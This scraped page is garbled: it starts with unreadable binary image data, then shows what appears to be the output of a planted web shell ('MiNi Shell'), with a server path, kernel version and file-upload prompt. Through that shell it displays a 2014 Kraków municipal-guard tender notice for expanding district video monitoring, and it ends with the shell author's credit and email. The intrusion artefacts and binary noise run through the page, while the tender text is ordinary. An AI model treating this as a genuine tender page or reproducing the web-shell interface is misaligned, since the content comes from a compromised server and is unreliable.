JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140605/190100-N-2014.html

<p class="kh_header"><b>Kraków: Rozbudowa i modernizacja monitoringu na terenie Dzielnicy XI</b><br>
<b>Numer ogłoszenia: 190100 - 2014; data zamieszczenia: 05.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja monitoringu na terenie Dzielnicy XI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest rozbudowa i modernizacja systemu monitoringu wizyjnego Dzielnicy XI i obejmuje:
* dostawę, montaż i uruchomienie urządzeń na osiedlu Piaski Nowe, 
Kurdwanów Nowy oraz siedzibie Oddziału IV Podgórze Straży Miejskiej Miasta 
Krakowa przy ul. Cechowej 19.
2. Zakres zamówienia (najważniejsze elementy zamówienia):
* dostawa, montaż i konfiguracja kamer szybkoobrotowych IP;
* dostawa, montaż i konfiguracja urządzeń do rejestracji obrazu z kamer; 
* dostawa i montaż konwerterów światłowodowych;
* dostawa i montaż switch-y;
* dostawa i montaż zasilaczy UPS  w wersji rack;
* konfiguracja systemu monitoringu zgodnie z obowiązującymi przepisami prawnymi,
* sporządzenie dokumentacji powykonawczej,
* przeszkolenie pracowników obsługi monitoringu,
* świadczenia z tytułu gwarancji oraz serwisowanie systemu.
3. Szczegółowy zakres prac zawarty jest w opisie technicznym przedmiotu zamówienia, 
który stanowi załącznik nr 10 do niniejszej specyfikacji.
4. Zakres prac oraz odpowiedzialność Wykonawcy obejmują także:
1) organizację i zabezpieczenie miejsca prowadzenia prac;
2) zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań i odbiorów 
oraz ewentualne uzupełnienie dokumentacji odbiorczej dla zakresu robót objętych 
przedmiotem zamówienia, wykonanie dokumentacji powykonawczej;
3) uzyskanie dodatkowych uzgodnień, pozwoleń, które okażą się niezbędne przy 
realizacji zamówienia na podstawie oddzielnego pełnomocnictwa udzielonego 
Wykonawcy przez Zamawiającego, a w szczególności od zarządców i właścicieli 
terenów;
4) właściwe oznakowanie i zabezpieczenie miejsca prowadzonych prac;
5) przeszkolenie osób zatrudnionych przy wykonywaniu zamówienia w zakresie 
przepisów BHP.

5. Odbioru przedmiotu zamówienia dokona Zamawiający i wyznaczeni przez 
Zamawiającego przedstawiciele w obecności Wykonawcy, w dniu wymaganego terminu wykonania zamówienia, chyba, że Wykonawca wcześniej zgłosi gotowość do odbioru.
6. Podstawą wystawienia faktury jest podpisany przez przedstawicieli Zamawiającego 
i Wykonawcę protokół odbioru przedmiotu zamówienia.
7.	Wymagany okres gwarancji nie krótszy niż 36 miesięcy.
8.	Szczegółowy opis zamówienia zawierają:  załączniki do SIWZ nr 8a, 8b, 8c, 8d 
(kosztorys ofertowy), 9 (przedmiar), 10 (opis - projekt przetargowy), 11 (rysunki od 1 
do 17) oraz 12 (załącznik Nr 1 do przedmiaru, określający parametry urządzeń).
9.	Zamawiający dopuszcza zastosowanie innych elementów, niż wskazane w opisie 
przedmiotu zamówienia, o parametrach równorzędnych lub wyższych 
od wskazanych w przedmiarze (zał. 9 i zał. 12 do SIWZ). 
	W przypadku zastosowania elementów równoważnych, Wykonawca ponosi pełną odpowiedzialność za prawidłową pracę całości systemu z uwzględnieniem jego 
elementów oraz kompatybilność w pełnym zakresie z dotychczas istniejącym 
systemem. 
10. Zamawiający zastrzega możliwość ograniczenia zakresu zamówienia lub jego etapowania w zależności od posiadanych środków finansowych.
11.	Zamawiający żąda przedłożenia kosztorysu ofertowego przez Wykonawcę, wg
wzoru - Załącznik nr 8a, 8b, 8c i 8d. Zamawiający informuje, iż wynagrodzenie
Wykonawcy za zrealizowanie całości przedmiotu umowy jest ryczałtowe, zaś
żądany kosztorys ofertowy wg Załącznika nr 8a, 8b, 8c i 8d ma charakter wyłącznie
pomocniczy dla Zamawiającego, w szczególności w zakresie oceny wartości
poszczególnych prac w sytuacji ich zmiany, zaniechania przez Zamawiającego.

Oznaczenie przedmiotu zamówienia wg CPV 32.23.40.00-2, 32.42.10.00-0, 32.42.20.00-7
 Zamawiający nie dopuszcza możliwości składania ofert częściowych.
Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.
Zamawiający nie przewiduje możliwości udzielania zamówień uzupełniających..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.23.40.00-2, 32.42.10.00-0, 32.42.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Wadium należy wnieść w kwocie: 18 000,00 zł (osiemnaście tysięcy zł 00/100);
2. Wadium może  być wnoszone w jednej lub kilku formach, wymienionych 
w art. 45 ust. 6 ustawy, przy czym wadium wnoszone w pieniądzu należy wpłacić:
- 	przelewem na rachunek Zamawiającego: 03 1240 4722 1111 0010 3082 8712  
prowadzony w Banku Pekao S. A.;
-	przed upływem terminu składania ofert (decyduje termin wpływu środków 
na rachunek Zamawiającego, tj. data i godzina zaksięgowania operacji przez Bank Zamawiającego);
-	wadium może być wpłacone wyłącznie w złotych (PLN).
3.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, 
gwarancji ubezpieczeniowej lub poręczenia udzielanego przez PARP, należy wnieść poprzez złożenie oryginału odpowiednich dokumentów w kasie Straży Miejskiej Miasta Krakowa, ul. Dobrego Pasterza 116, 31-416 Kraków, II piętro. Kserokopię poświadczoną za zgodność z oryginałem oraz pokwitowanie złożenia oryginału w kasie SMMK należy  dołączyć do oferty.
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie 
zgłoszone przez Zamawiającego w terminie związania ofertą Wykonawcy, 
zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty.
4.	Zamawiający dokona zwrotu wadium zgodnie z przepisami ustawy, lub zatrzyma w okolicznościach określonych w art. 46 ust. 5 ustawy. 


5.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy 
lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących 
po jego stronie.
6.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz
z odsetkami, w przypadku, gdy Wykonawca:
1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.
7.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku 
bankowym i zwróci je wraz z odsetkami, wynikającymi z umowy rachunku 
bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz 
prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia 
- na postawie załączonego do oferty oświadczenia Wykonawcy 
potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą 
spełnia/nie spełnia - na podstawie załączonego do oferty oświadczenia 
Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 2 do SIWZ. 
Oprócz oświadczenia, dla oceny warunku wiedzy i doświadczenia , wymagane jest od Wykonawcy załączenie do oferty wykazu dostaw wykonanych 
w okresie ostatnich trzech latach przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym 
okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz dowodów dotyczących najważniejszych dostaw, określających, czy dostawy 
te zostały wykonane w sposób należyty. Wykonawca musi udokumentować 
należyte wykonanie minimum dwóch dostaw obejmujących systemy 
monitoringu miejskiego IP, na kwotę co najmniej 300.000,00 zł każda z nich, w ciągu ostatnich trzech lat.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia 
- na podstawie załączonego do oferty oświadczenia Wykonawcy 
potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 2 do SIWZ. Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia 
- na podstawie załączonego do oferty oświadczenia Wykonawcy 
potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 2 do SIWZ. 
Oprócz oświadczenia, dla oceny warunku dysponowania osobami zdolnymi 
do realizacji zamówienia, wymagane jest załączenie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług i kontrolę jakości, wraz z informacjami na temat ich 
kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych 
do wykonania zamówienia, a także zakresu wykonywanych przez nie 
czynności, oraz informacji o podstawie do dysponowania tymi osobami. 
Osoby te muszą posiadać odpowiednie upoważnienia i zaświadczenia. 
Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów 
do udostępnienia osób zdolnych do wykonania zamówienia.
	Pracownicy Wykonawcy muszą legitymować się odpowiednią wiedzą, 
	doświadczeniem i uprawnieniami, w szczególności: instalatorzy winni 
	posiadać uprawnienia SEP oraz zaświadczenia o wpisie na listę 
	kwalifikowanych pracowników zabezpieczenia technicznego (dotyczy także 	osoby kierującej pracami lub nadzorującej je). Należy dołączyć uwierzytelnione kserokopie uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia 
- na podstawie załączonego do oferty oświadczenia Wykonawcy 
potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Koncesja MSWiA/MSW.
2. Informacja z Krajowego Rejestru Karnego dotycząca Wykonawcy i osób reprezentujących Wykonawcę.
3. Zaświadczenia (kserokopie uwierzytelnione przez Wykonawcę) o wpisie na listę  
kwalifikowanych pracowników zabezpieczenia technicznego zgodnie z art. 28 ustawy 
z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jednolity: Dz. U. z 2005 r. Nr 145 poz. 1221 z późn. zm.) dla pracowników realizujących zamówienie, uprawnienia 
do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień.
4. Opłacona polisa na kwotę co najmniej 500 tys. zł, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
5. Dokument gwarancyjny.
6. Kosztorys ofertowy.
7. Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2014 godzina 10:00, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com